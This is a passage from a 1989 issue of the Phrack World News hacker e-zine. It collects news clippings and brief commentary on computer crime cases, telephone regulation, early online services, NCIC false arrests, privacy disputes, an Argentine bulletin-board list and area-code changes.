  5221. What's Happening:  Computer Security Up                            June 4, 1989
  5222. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5223. Taken from Gannett Westchester Newspapers
  5224.  
  5225.                    [Comments in brackets from Delta-Master]
  5226.  
  5227. High-tech companies are spending 64% more [than they previously spent] on
  5228. computer security, according to a recent survey conducted by the National
  5229. Center for Computer Crime Data in Los Angeles.  The group surveyed 3,500 law
  5230. enforcement agencies and computer security experts about computer crime.  The
  5231. prosecution rate is also up -- 6.4% in 1988 from only 2.4% during 1987.
  5232.  
  5233. Contrary to popular image, computer hackers aren't always young boys.  The
  5234. study found that 32% of those arrested for computer crimes were female, while
  5235. only 14% were under 21.  The study said 45% of hackers were 25 to 30 years old.
  5236. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5237.  
  5238. Comments from Delta-Master
  5239. ~~~~~~~~~~~~~~~~~~~~~~~~~~
  5240. I do not know about you people, but the public's confusion about hackers starts
  5241. to bother me when they make errors.  Seriously, I know of only a few hackers
  5242. over the age of 21.  The fact that the newspapers also equate the thug-like
  5243. computer criminals with the mastermind-criminal type hacker (you guys) is also
  5244. pretty annoying, wouldn't you agree?  One key phrase you must note: "32% OF
  5245. THOSE ARRESTED."  Oh well, such are the mistakes of newspapers.
  5246. _______________________________________________________________________________
  5247.  
  5248. Public Service Commission Bans Operator Companies                April 24, 1989
  5249. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5250. By Jerri Stroud (St. Louis Post-Dispatch)
  5251.  
  5252. The Missouri Public Service Commission voted 4-1 last week to ban providers of
  5253. so-called alternative operator services in Missouri because allowing the
  5254. companies to operate is "not in the public interest."
  5255.  
  5256. Alternative operator services companies contract with hotels, motels colleges,
  5257. hospitals, airports, restaurants and other facilities to provide operator
  5258. assistance to customers using pay telephones or house phones.  Consumer groups
  5259. have complained about price-gouging by the companies nationwide.
  5260.  
  5261. Mark Wheatley, a lawyer for the Office of Public Council, praised the
  5262. commission's decision.
  5263.  
  5264. The Office of Public Council has received numerous complaints about excessive
  5265. rates and surcharges by alternative operator services companies, said Wheatley.
  5266. Some alternative operator services companies also have accepted other
  5267. companies' credit cards without authorization from the companies issuing the
  5268. cards, he said.
  5269.  
  5270. "We feel that it's an extremely important decision by the commission." said
  5271. Wheatley.  But he said he expects the companies affected by the ruling to
  5272. appeal.
  5273.  
  5274. Lawyers for the alternative operator services companies could not be reached
  5275. for comment.
  5276.  
  5277. In it's ruling, the commission said many consumers aren't aware of the rates
  5278. charged by the alternative operator services companies until they receive "a
  5279. bill for operator services at prices higher than those to which he is
  5280. accustomed."  Consumer groups say the rates often are twice or three times the
  5281. rates charged by better-known long-distance companies.
  5282.  
  5283. Even if an operator service company identifies itself when a consumer makes a
  5284. call, the commission said many consumers don't understand the significance of
  5285. the identification.
  5286.  
  5287. "If the end user is not educated as to the intricacies of using an alternative
  5288. operator services provider, he does not truly have a meaningful choice..." the
  5289. commission said.
  5290.  
  5291. The ruling only affects intrastate calls handled by alternative operator
  5292. services companies, but it may effectively prevent the companies from providing
  5293. interstate service as well.
  5294.  
  5295. The commission specifically denied tariff requests from International
  5296. Telecharge Inc. and American Operator Services Inc.  The commission also
  5297. directed three other companies -- Teleconnect Inc., Dial US, and Dial USA -- to
  5298. file new tariffs consistent with the ruling.
  5299.  
  5300. The ruling allows companies to operate who provide operator services in
  5301. connection with their business -- long-distance carriers and local telephone
  5302. companies, for example.  But the commission also placed limits on these
  5303. companies.
  5304.  
  5305. Under the ruling, operator services companies must:
  5306.  
  5307.      * Identify themselves to the caller as well as to the party being billed
  5308.        by the call (in the case of a collect or third-party call).
  5309.  
  5310.      * Quote rates to the caller or billed party on request, without charge.
  5311.  
  5312.      * Use calling card verification procedures acceptable to the companies
  5313.        issuing the cards.
  5314.  
  5315.      * Post in a prominent position the company's name, detailed complaint
  5316.        procedures and instruction on how to reach the local telephone company
  5317.        operator and other long-distance carriers.
  5318.  
  5319.      * Transfer emergency traffic to the local telephone company or American
  5320.        Telephone & Telegraph Co. until the alternative services provider can
  5321.        show that it can handle emergency calls adequately.
  5322. _______________________________________________________________________________
  5323.  
  5324. Fax Attack                                                         May 13, 1989
  5325. ~~~~~~~~~~
  5326. Taken from The Ann Arbor News
  5327.  
  5328.        "Governor's Attempt To Ban Unsolicited Advertisements Backfires!"
  5329.  
  5330. HARTFORD, Conn - The great fax attack of 1989 -- an all-out lobbying campaign
  5331. against a bill banning unsolicited facsimile advertising -- may have backfired
  5332. when the governor's fax machine was jammed for hours with unwanted messages.
  5333.  
  5334. Starting Thursday, May 11, and continuing Friday, May 12, Governor William A.
  5335. O'Neill's fax machine has been beeping constantly, spitting out unwanted
  5336. messages from angry businesses that advertise by fax.
  5337.  
  5338. The businesses oppose a bill now awaiting O'Neill's signature that would
  5339. prohibit them from marketing their products by fax without first obtaining the
  5340. permission of the recipient.  Violators would face a $200 fine.
  5341.  
  5342. Starting Thursday morning, dozens of Connecticut businesses faxed to O'Neill's
  5343. office a form letter arguing against the fax ban.  The stream of fax messages
  5344. was so constant (40 came in before 10 AM) that the governor's office turned off
  5345. the fax machine Thursday (May 11).
  5346.  
  5347. O'Neill's press secretary, Jon. L. Sandberg, said the governor still hasn't
  5348. decided whether he will sign the bill.  But aides to the governor said the
  5349. persistent lobbying campaign proved how annoying unwanted messages can be.  The
  5350. inconvenience was compounded because the governor's office was unable to use
  5351. its fax machine to receive information about spring flooding around the state.
  5352. _______________________________________________________________________________
  5353.  
  5354. NYNEX Announces Info-Look Gateway                                April 28, 1989
  5355. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5356. Introducing a new service for accessing information and more... all through
  5357. your personal computer!
  5358.  
  5359. Starting in May 1989, New York Telephone's INFO-LOOK (tm) Gateway Service can
  5360. be your link to accessing a variety of information, products and services.
  5361.  
  5362. The INFO-LOOK Gateway simplifies on-line computer access to a variety of
  5363. information providers.  When you call the Gateway phone number through your
  5364. modem, you'll be able to scan a menu of information services.
  5365.  
  5366. The types of information services you may choose from include:  Entertainment,
  5367. business, health, food, news, weather, sports, travel, government, educational
  5368. and reference information.  The services, some interactive, are provided by
  5369. independent companies.
  5370.  
  5371. The INFO-LOOK Gateway is easy to use -- even if you're relatively new to using
  5372. a PC.
  5373.  
  5374. What you'll need to use the INFO-LOOK Gateway
  5375.  
  5376. 1.  Virtually any type of personal computer.
  5377.  
  5378. 2.  A modem (300, 1200, or 2400 Baud), and communications software.  This
  5379.     enables your computer to communicate with other computers via the telephone
  5380.     system.
  5381.  
  5382. 3.  A New York Telephone Calling Card.  If you need a New York Telephone
  5383.     Calling Card, (it's FREE), call your service representative whose number
  5384.     appears on page one of your New York Telephone bill.
  5385.  
  5386. Charges for using the INFO-LOOK Gateway
  5387.  
  5388. There are ** no ** Gateway enrollment fees and ** no ** monthly subscription
  5389. charges.  In most cases, you will be charged (New York people only):
  5390.  
  5391. o  A local call to reach the INFO-LOOK Gateway.
  5392.  
  5393. o  While you're browsing the Gateway directory of services, or moving between
  5394.    services, you pay $.05 a minute.
  5395.  
  5396. o  Once you connect to a service, the charge is determined by the Service
  5397.    Provider.  Some services have a per-minute usage charge.  Some services are
  5398.    free.  The charges for each service are listed in the Gateway menu.
  5399.  
  5400. You'll find most charges itemized on your monthly New York Telephone bill.
  5401. Some Service Providers may decide to bill you separately and directly for use
  5402. of their services.
  5403.  
  5404. Call for more information:
  5405.  
  5406. To get your free INFO-LOOK Gateway information booklet call (toll- free)
  5407. 1-800-338-2720, Ext. 20, any day from 9 a.m. to 11 p.m.
  5408.  
  5409. Note:  New York Telephone does not provide or control the services offered
  5410.        through the INFO-LOOK Gateway Service.  They are provided by independent
  5411.        companies, which are responsible for the content, character, and quality
  5412.        of their services.
  5413.  
  5414. The predictions run $5 billion now and another $5-10 billion by 1991.
  5415.  
  5416.        [INFO-LOOK is already operating in Bell South and Bell Atlantic.]
  5417. _______________________________________________________________________________
  5418.  
  5419. Pacific Bell Plans Access To Computers                             June 9, 1989
  5420. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5421. Taken from Santa Cruz Sentinel (Section B)
  5422.  
  5423. SAN FRANCISCO (AP) -- Pacific Bell said Thursday it hopes to compete with the
  5424. popularity of television by offering people easy access to computerized
  5425. libraries, bulletin boards and the use of electronic mail.
  5426.  
  5427. PacBell's California On-line -- which will be available to anybody with a
  5428. personal computer, telephone and calling card -- will be among the first in the
  5429. nation to use a graphic-based system that simplifies procedures so only a
  5430. rudimentary familiarity with computers is needed.
  5431.  
  5432. "It's going to offer our customers a supplement to their current leisure
  5433. activities... and among other things we've seen (in trials) a lot of people
  5434. who got away from the TV," said Roger P. Conrad, director of Videotex Gateway
  5435. Services.
  5436.  
  5437. "We feel this is a more productive way for people to spend their lives and we
  5438. think a lot of users are going to agree," he added.  Users will pay
  5439. "info-entrepreneurs" fees based on the time they use various services and will
  5440. be billed on their monthly telephone statements.  Unlike some on-line
  5441. information services, users do not have to subscribe ahead of time.
  5442.  
  5443. Conrad said the types of services are limited only by vendors' imaginations.
  5444. PacBell will make money by selling telecommunication line use to the companies.
  5445. _______________________________________________________________________________
  5446.  
  5447. Bulletin Boards Of Argentina                                       June 5, 1989
  5448. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5449. Country Code = 54 (Argentina)
  5450. City Code  = 1    (Buenos Aires)
  5451.  
  5452. This list might be slightly incorrect due to the passage of time.  The last
  5453. update was on December 23, 1986.
  5454.  
  5455. Name                    Hours Of Operation       ======= Number=
  5456. ----
  5457. Beta                    23:00 -  6:30     802-0288
  5458. C-Mania                 21:00 -  7:00     362-8843
  5459. CBM                     16:00 - 12:00      90-4988
  5460. Century 21              24 hours          632-7070
  5461. Cerebruss               24 hours           47-2717
  5462. Cerebruss Information   ?                  48-8300
  5463.                                            48-9886
  5464. Databank                ?                  44-9760
  5465. Drean Conection         ?                 953-2523
  5466. Los Pinos               13:00 - 19:00      21-0375
  5467. Magenta                 ?                 392-0124
  5468. Magenta                 ?                 392-0016
  5469. Maxes                   23:00 - 7:00      542-2695
  5470. Mendieta                22:00 - 8:00      654-6999
  5471. Pirates Cove            24:00 - 6:00      783-5023
  5472. Sanctuary               24:00 - 3:00      641-4608
  5473. Soft-work               22:30 - 9:00       88-2065
  5474. TCConection             19:00 - 12:00      22-4197
  5475. The Connection          24 Hours           82-5780
  5476. The Hacker              23:00 - 7:00      748-2005
  5477. Tiger                   ?                 784-2226
  5478. XCASA                   ?                 611-8136
  5479. BBS-IOM                 24 Hours          804-3602
  5480.  
  5481. Note:  The settings for all systems listed above are Even, 7, 1.
  5482.  
  5483.                               Contributed by Noli
  5484. _______________________________________________________________________________
  5485.  
  5486.  
  5487.                                 ==Phrack Inc.==
  5488.  
  5489.                      Volume Three, Issue 27, File 12 of 12
  5490.  
  5491.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  5492.             PWN                                                 PWN
  5493.             PWN        P h r a c k   W o r l d   N e w s        PWN
  5494.             PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
  5495.             PWN               Issue XXVII/Part 3                PWN
  5496.             PWN                                                 PWN
  5497.             PWN                  June 20, 1989                  PWN
  5498.             PWN                                                 PWN
  5499.             PWN          Created, Written, and Edited           PWN
  5500.             PWN               by Knight Lightning               PWN
  5501.             PWN                                                 PWN
  5502.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  5503.  
  5504.  
  5505. One of Cliff Stoll's "Wily Hackers" Is Dead (Suicide?)             June 5, 1989
  5506. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5507. According to West German publications, the "Wily Hacker" Karl Koch, of
  5508. Hannover, West Germany, died Friday, June 3, probably by suicide.  His body was
  5509. found burnt (with gasoline) to death, in a forest near Celle (a West German
  5510. town near Hannover where he committed his hacks, as had been observed by German
  5511. Post).
  5512.  
  5513. Koch was one of the 2 hackers who confessed their role in the KGB hack to the
  5514. public prosecutors, therewith bringing the case to public attention.  As German
  5515. newspapers report, he probably suffered from a psychic disease:  He thought he
  5516. was permanently observed by alien beings named Illimunates' which tried to kill
  5517. him.  Probably, he had internalized the role of "Captain Hagbard" (his
  5518. pseudonym in the hacking scene), taken from a U.S. book, who (like him)
  5519. suffered from supervision by the Illuminates. Police officials evidently think
  5520. that Koch committed suicide (though it is believed, that there are "some
  5521. circumstances" which may also support other theories; no precise information
  5522. about such moments are reported).
  5523.  
  5524. According to German police experts, Karl Koch's role in the KGB case as in
  5525. daily life can properly be understood when reading this unknown book.
  5526.  
  5527.                    Information Provided by Klaus Brunnstein
  5528.                             (University of Hamburg)
  5529.  
  5530.                                         [Illuminates... KGB... whatever... -KL]
  5531. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5532.  
  5533. Illuminatus!                                                      June 14, 1989
  5534. ~~~~~~~~~~~~
  5535. The book in question is believed to be "Illuminatus!" by Harold Shea and Robert
  5536. Anton Wilson.  The book is a spoof on conspiracy theories, and suggests that
  5537. many and probably all human institutions are just fronts for a small group of
  5538. "enlightened ones," who are themselves a front for the Time dwarves from
  5539. Reticuli Zeta, or perhaps Atlantean Adepts, remnants of Crowley's Golden Dawn,
  5540. or even more likely the Lloigor of H.P. Lovecraft's Cthulhu Mythos.  A leading
  5541. character in this book is named Hagbard Celine.
  5542.  
  5543. "Illuminatus!" is a fun read if you like psychedelia and paranoia.  It also
  5544. seems to have influenced a lot of subsequent work, most notably Adams'
  5545. "Hitchhiker's Guide to the Galaxy."  It is easy to see how an unbalanced mind,
  5546. taking it literally, could be completely absorbed.  In fact "Illuminatus!"
  5547. seems as if it was written with the intent of just this sort of programming,
  5548. referring to it as "Operation Mindfuck."
  5549.  
  5550. This is probably not a real danger for the vast majority of sane adults, but it
  5551. may, tragically, have been the case here.  Or perhaps, no disrespect intended,
  5552. Koch may in the course of various hacks really have discovered too much about
  5553. the Illuminati.  After all, they are supposed to be the secret power behind the
  5554. KGB :-)
  5555. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5556.  
  5557. For more information on Clifford Stoll and the Wily Hackers of West Germany,
  5558. please see:
  5559.  
  5560. "Who Is Clifford Stoll?"        (No Date) Phrack World News issue XXII/Part 1
  5561. "A Message From Clifford Stoll" (1/10/89) Phrack World News issue XXIII/Part 2
  5562.  
  5563. And the following articles all found in Phrack World News issue XXV/Part 2:
  5564.  
  5565.        "German Hackers Break Into Los Alamos and NASA"         (3/2/89)
  5566.        "Computer Espionage:  Three 'Wily Hackers' Arrested"    (3/2/89)
  5567.        "Computer Spy Ring Sold Top Secrets To Russia"          (3/3/89)
  5568.        "KGB Computer Break-Ins Alleged In West Germany"        (3/3/89)
  5569.        "News From The KGB/Wily Hackers"                        (3/7/89)
  5570. _______________________________________________________________________________
  5571.  
  5572. Sex Put On Probation By Mystery Hacker                            June 13, 1989
  5573. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5574. Ft. Lauderdale News and Sun-Sentinel
  5575.  
  5576.       "Yes, you sound very sexy, but I really need a probation officer."
  5577.  
  5578. DELRAY BEACH, Fla. -- Callers trying to dial a probation office in Delray
  5579. Beach, Fla on Monday, June 12, heard a smorgasbord of sex talk from a panting
  5580. woman named Tina instead.
  5581.  
  5582. Southern Bell telephone officials said a computer hacker reprogrammed their
  5583. equipment over the weekend, routing overflow calls intended for the local
  5584. probation office to a New York-based phone sex line.
  5585.  
  5586. "People are calling the Department of Corrections and getting some kind of sex
  5587. palace," said Thomas Salgluff, a spokesman for the Palm Beach County probation
  5588. office.
  5589.  
  5590. Southern Bell officials said it was the first time their switching equipment has
  5591. been reprogrammed by an outside computer intruder.  Southern Bell provides
  5592. local telephone service in Florida, Georgia, North Carolina, and South
  5593. Carolina.
  5594.  
  5595. "We're very alarmed," said Southern Bell spokesman Buck Passmore.  He said such
  5596. a feat would require someone with considerable computer knowledge.
  5597.  
  5598. The implications of such a computer breach are considerable.  Intercepting
  5599. corporate communications, uncovering unlisted phone numbers, and tampering with
  5600. billing information are all plausible consequences of computer security
  5601. breaches at the the phone company.
  5602.  
  5603. Hackers have invaded Southern Bell in the past, but they have never
  5604. reprogrammed a telephone link, Passmore said.
  5605.  
  5606. Security technicians from Southern Bell and AT&T are trying to trace the source
  5607. of the computer breach, Passmore said.
  5608. _______________________________________________________________________________
  5609.  
  5610. Hacking For A Competitive Edge                                     May 12, 1989
  5611. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5612. Taken from the Los Angeles Times
  5613.  
  5614. Two former Tampa, FLA TV news managers have been charged with illegally tapping
  5615. into phone lines and computers at another station to gain a news edge over
  5616. their competitors.  Former new director Terry Cole and assistant news director
  5617. Michael Shapiro at WTSP-TV have been charged with 17 counts of computer hacking
  5618. and conspiracy in the theft of information from WTVT-TV through computer phone
  5619. lines, authorities said.  Their arraignment was set for May 19.
  5620.  
  5621. If convicted, each could face a maximum prison sentence of 85 years.  The two
  5622. were fired from WTSP when the station learned of the alleged thefts.  The
  5623. break-ins began in November, 1988, but were not noticed until January 12, 1989,
  5624. when WTVT's morning news producer noticed that files were missing, authorities
  5625. said.
  5626.  
  5627. Computer experts determined that an intruder had rifled the files.  Authorities
  5628. said Shapiro knew WTVT's security system thoroughly because he had helped set
  5629. it up while working there as an assignment manager before being hired away from
  5630. WTVT in October.
  5631. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5632.  
  5633. TV News Executives Fired After Hacking Charges From Rival
  5634. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5635. Tampa, Fla. -- A Florida television station fired two news executives in the
  5636. wake of reports that one of them allegedly penetrated a rival station's
  5637. computer system and stole sensitive information.
  5638.  
  5639. WTSP-TV (Channel 10), an ABC affiliate in St. Petersburg, announced that it had
  5640. fired Assistant News Director Michael Shapiro and News Director Terry Cole.
  5641.  
  5642. Shapiro was arrested on February 7th on felony charges for allegedly breaking
  5643. into a computer system at WTVT-TV (Channel 13) on at least six occasions in
  5644. January.  He was once employed by WTVT as an assistant manager and was
  5645. responsible for administering the station's computer systems.
  5646.  
  5647. Law enforcement officials seized from Shapiro's home a personal computer, 200
  5648. floppy disks and an operating manual and user guide for software used at the
  5649. rival station.
  5650.  
  5651. He has been charged with 14 felony counts under Florida Statute 815, which
  5652. covers computer-related crimes.  Each count carries a maximum sentence sentence
  5653. of 15 years and a $10,000 fine.
  5654.  
  5655. Vince Barresi, WSTP's vice-president and general manager, refused to comment on
  5656. the two firings.  However, in a prepared statement, he said that he told
  5657. viewers during an 11 PM newscast last Tuesday that the station acted to "avoid
  5658. any questions about the objective way we do our business in keeping the public
  5659. informed."
  5660.  
  5661. Cole, who hired Shapiro last September, has not been charged by Florida law
  5662. enforcement officials.  He was fired, according to one source, because as
  5663. director of the news room operations, he is held ultimately for the actions of
  5664. news staffers.  Shapiro and Cole were unavailable for comment.
  5665.  
  5666. [Another story that discussed this case was "Television Editor Charged In Raid
  5667. On Rival's Files" (February 8, 1989).  It appeared in Phrack World News Issue
  5668. XXIV/Part 2. -KL]
  5669. _______________________________________________________________________________
  5670.  
  5671. National Crime Information Center Leads To Repeat False Arrest     May 14, 1989
  5672. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5673. by James Rainey (Los Angeles Times)
  5674.  
  5675. Mix ups with the databases at the NCIC have caused Roberto Perales Hernandez to
  5676. be jailed twice in the last three years as a suspect in a 1985 Chicago
  5677. residential burglary.  The authorities confused him with another Roberto
  5678. Hernandez due to a single entry in the FBI's National Crime Information Center
  5679. computer.
  5680.  
  5681. The two Roberto Hernandezes are the same height, about the same weight, have
  5682. brown hair, brown eyes, tattoos on their left arms, share the same birthday,
  5683. and report Social Security numbers which differ by only one digit!
  5684.  
  5685. The falsely imprisoned man has filed suit charging the Hawthorne, California
  5686. Police Department, Los Angeles County, and the state of California with false
  5687. imprisonment, infliction of emotional distress, and civil rights violations
  5688. stemming from the most recent arrest last year.
  5689.  
  5690. He had previously received a $7,000 settlement from the county for holding him
  5691. 12 days in 1986 before realizing he was the wrong man.  In the latest incident,
  5692. he was held for seven days then freed with no explanation.
  5693. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5694.  
  5695. Another False Incarceration                                        May 18, 1989
  5696. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5697. In his testimony on May 18, 1989 to the Subcommittee on Civil and
  5698. Constitutional Rights of the Committee on the Judiciary of the U.S. House of
  5699. Representatives, relating to the National Crime Information Center, David D.
  5700. Redell cited another case of false incarceration concerning Roberto Perales
  5701. Hernandez as well as various cases noted earlier -- such as that of Terry Dean
  5702. Rogan [see below]:
  5703.  
  5704.      "Only last week, a case in California demonstrated the potential
  5705.      benefit of easy access to stored images.  Joseph O. Robertson had
  5706.      been arrested, extradited, charged, and sent to a state mental
  5707.      facility for 17 months.  During that entire time, mug shots and
  5708.      fingerprints were already on file showing clearly that he was the
  5709.      wrong man, but no one had taken the trouble to check them."
  5710.  
  5711. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5712. These articles show clear examples of the damage and problems caused by this
  5713. "super" database.  People like William Bayse (Federal Bureau of Investigation's
  5714. Director For Technical Services) and William Sessions (Director of the FBI)
  5715. either fail to realize this or perhaps they just do not care (as long as
  5716. something similar does not happen to them).
  5717.  
  5718. For those of you who are interested in looking into this further, the first
  5719. article about this NCIC database was; "'Big Brotherish' Data Base Assailed,"
  5720. (November 21, 1988).  It appeared in Phrack World News Issue XXII/Part 3.
  5721.  
  5722. Another incident similar to the cases mentioned above concerned Richard
  5723. Lawrence Sklar, a political science professor at the University of California
  5724. at Los Angeles.  He was mistaken by the computer for a fugitive wanted in a
  5725. real estate scam in Arizona.  Before the FBI figured out that they had the
  5726. incorrect person, Sklar, age 58, spent two days being strip searched, herded
  5727. from one holding pen to another, and handcuffed to gang members and other
  5728. violent offenders.  For more details on this case and the case concerning Terry
  5729. Dean Rogan, please refer to "FBI National Crime Information Center Data Bank,"
  5730. (February 13, 1989) which appeared in Phrack World News Issue XXIV/Part 2 (as
  5731. well as the Washington Post).
  5732. _______________________________________________________________________________
  5733.  
  5734. TRW and Social Security Administration                             May 12, 1989
  5735. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5736. The credit bureau of TRW has been working with the Social Security
  5737. Administration to verify its database of 140 million names and Social Security
  5738. numbers.  In order to cover the cost, TRW is paying the Social Security
  5739. Administration $1 million, while Social Security Administration will provide a
  5740. matching $1 million.
  5741.  
  5742. Since the Social Security Administration is asking for a budget increase for
  5743. their computer and telecommunications systems, several legislators are outraged
  5744. by the fact they they are spending $1 million for this non-government project.
  5745. Claiming that the project is "as far away from the mission of the Social
  5746. Security Administration as anything I have ever come across," Senator David
  5747. Pryor (D-Ark) questioned the competence and credibility of Social Security
  5748. Administration Commissioner Dorcas R. Hardy and asked for an investigation by
  5749. the HHS inspector general.
  5750.  
  5751. In addition, several lawmakers such as Dale Bumpers (D-Ark) believe the project
  5752. to be a violation of civil liberties. Said Bumpers, "I don't like any public
  5753. institution releasing an individual's private information."  The American Law
  5754. Division of the Congressional Research Service has already concluded that the
  5755. project is a violation of the Privacy Act of 1974.
  5756.  
  5757. [A related article, "Verifying Social Security Numbers," (April 11, 1989)
  5758. appeared in Phrack World News Issue XXVI/Part 3 (as well as the New York Times
  5759. on the same date). -KL]
  5760. _______________________________________________________________________________
  5761.  
  5762. Phrack World News XXVII Quicknotes
  5763. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5764. 1.  The current name assigned to the new network being created by the merger
  5765.     of BITNET and CSNET is ONENET.
  5766. -------------------------------------------------------------------------------
  5767. 2.  NPA 903 Assigned to NE Texas (May 10, 1989) -- It was just announced that
  5768.     those portions of 214 outside Dallas will be changed to 903 in the Fall of
  5769.     1990.
  5770.  
  5771.     With 708 assigned to Chicago, 903 assigned to Texas, and 908 assigned to
  5772.     New Jersey, only 909 and 917 remain to be assigned before the format
  5773.     changes.
  5774. -------------------------------------------------------------------------------
  5775. 3.  Details On New Area Code 510 (June 6, 1989) -- The press release from
  5776.     Pacific Bell, quoted in the San Francisco Chronicle, gives the phase-in
  5777.     dates for the new NPA 510.
  5778.  
  5779.     Inception is scheduled for October 7, 1991, with a four-month grace period
  5780.     when NPA 415 will still work for the affected numbers.  Final cutover is
  5781.     scheduled for January 27, 1992.
  5782.  
  5783.     NPA 510 will encompass Alameda and Contra Costa counties, which currently
  5784.     have 842,388 customers out of the current 2,005,687 customers in NPA 415.
  5785. -------------------------------------------------------------------------------
  5786. 4. New Jersey Area Code To Be Split (April 27, 1989) -- The split is not
  5787.    supposed to occur until 1991.  The new NPA will be 908 and it will basically
  5788.    cover the southern "half" of the current 201 area.  The affected counties
  5789.    will be Warren, Hunterdon, Middlesex, Union, Monmouth and Ocean, and the
  5790.    southwest corner of Morris).  Counties remaining in 201 will be Sussex,
  5791.    Passaic, Bergen, Essex, Hudson, and the majority of Morris.
  5792.  
  5793.    New Jersey Bell will also start requiring area codes on calls into New York
  5794.    and Pennsylvania that have been considered part of New Jersey local calling
  5795.    areas.  This will apparently take effect October 2 and free up about 25
  5796.    exchanges.  Information from the Asbury Park Press.
  5797.  
  5798.        [This last line somewhat contradicts the first line as far as the
  5799.        dates are concerned.  More information as we get it.      -- KL.]
  5800. -------------------------------------------------------------------------------
  5801. 5. New Area Codes For London (April 27, 1989) -- British Telecom has announced
  5802.    that the area code for London is to be changed on May 6th, 1990, due to the
  5803.    increased number of lines needed in the capital.
  5804.  
  5805.    The existing code is 01-, and the new codes to be introduced are 071- for
  5806.    the centre of the city and 081- for the suburbs.  A list was published in
  5807.    the Evening Standard, showing which exchanges will fall in which area.
  5808. -------------------------------------------------------------------------------
  5809. 6.  Member Learns The Hard Way:  American Express Is Watching (May 4, 1989) --
  5810.     This article taken from the San Jose Mercury News describes how American
  5811.     Express called a member to voice their concern that he might not be able to
  5812.     pay his recent bill.  American Express was able to access his checking
  5813.     account and find that he had less than what was owed to them.  His card was
  5814.     temporarily "deactivated" after the member refused to give any financial
  5815.     information except that he would pay up the bill with cash when it came in.
  5816.  
  5817.     Apparently, the card application, in finer print, declares that "[American
  5818.     Express reserves] the right to access accounts to ascertain whether you are
  5819.     able to pay the balance."  After some arguments with the company, the
  5820.     member comments that "I learned a lesson:  My life is not as private as I
  5821.     thought."
  5822. -------------------------------------------------------------------------------
  5823. 7.  Southwestern Bell's QuickSource (April 24, 1989) -- Southwestern Bell
  5824.     Telephone Company is running a one year trial (March 1989 89 - March 1990)
  5825.     of two information services:  QuickSource (audiotex) and Sourceline
  5826.     (videotext).  The latter requires a terminal of some type, but the former
  5827.     only requires a touch-tone phone for access.  The QuickSource number is
  5828.     323-2000, but cannot be accessed via 1+713+; SWBTCo has blocked access to
  5829.     "the Houston metro area served by SWBTCo," according to the script the
  5830.     woman reads to you when ask for help (713-865-5777; not blocked).  The help
  5831.     desk will send you a free QuickSource directory though.
  5832. -------------------------------------------------------------------------------
  5833. 8.  Telemail, MCI, AT&T Mail Interconnection (May 16, 1989) -- U.S. Sprint's
  5834.     subsidiary, Telenet has announced an interconnection agreement between
  5835.     Telemail, Telenet's electronic mail product, MCI Mail, and AT&T Mail.
  5836.  
  5837.     The new arrangement, scheduled to be in effect later this summer, will
  5838.     allow the 300,000 worldwide users of Telemail, the 100,000 users of MCI
  5839.     Mail and the 50,000 users of AT&T Mail to conveniently send email messages
  5840.     to each other.
  5841. -------------------------------------------------------------------------------
  5842. 9.  Illinois Bell Knocked Out For Four Hours! (May 18,1989) -- Service to over
  5843.     40,000 Illinois Bell subscribers in the northwest suburbs of Chicago was
  5844.     disrupted for about four hours because of problems with the computer in the
  5845.     switching center.
  5846.  
  5847.     Phones were either dead or inoperative for incoming and outgoing calls
  5848.     between 9:30 a.m. and 1:40 p.m. because of a software glitch at the central
  5849.     office in Hoffman Estates, IL.  Most of the disruption occurred in Hoffman
  5850.     Estates, Schaumburg, Arlington Heights, Hanover Park, and Streamwood, IL.
  5851.  
  5852.     The exact nature of the problem was not discussed by the Bell spokesman who
  5853.     reported that the outage had been corrected.  Apparently the backup system
  5854.     which is supposed to kick in also failed.
  5855. -------------------------------------------------------------------------------
  5856. 10. SRI Attacked By Kamikaze Squirrels (May 29, 1989) -- It seems that the Data
  5857.     Defense Network SRI's "no-single-point-of-failure" power system failed at
  5858.     the hands, or rather the paws, of a squirrel.  The power was off for
  5859.     approximately 9 hours and they experienced no hardware problems.  This was
  5860.     at least the third time that a squirrel has done SRI in.
  5861. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5862. 11. New York Telephone Freebies (June 10, 1989)(San Francisco Chronicle, p. 2.)
  5863.     -- 24 pay phones along the Long Island Expressway were in fact free phones
  5864.     because of a programming/database screw-up.  They were being heavily used
  5865.     for long distance calls by those who had discovered the oversight,
  5866.     including many to Pakistan (Police found 15 Pakistani men using the phones
  5867.     when they went to investigate after a shooting).  There were no estimates
  5868.     on the unrecovered cost of the phone calls.
  5869. _______________________________________________________________________________
  5870.  
  5871.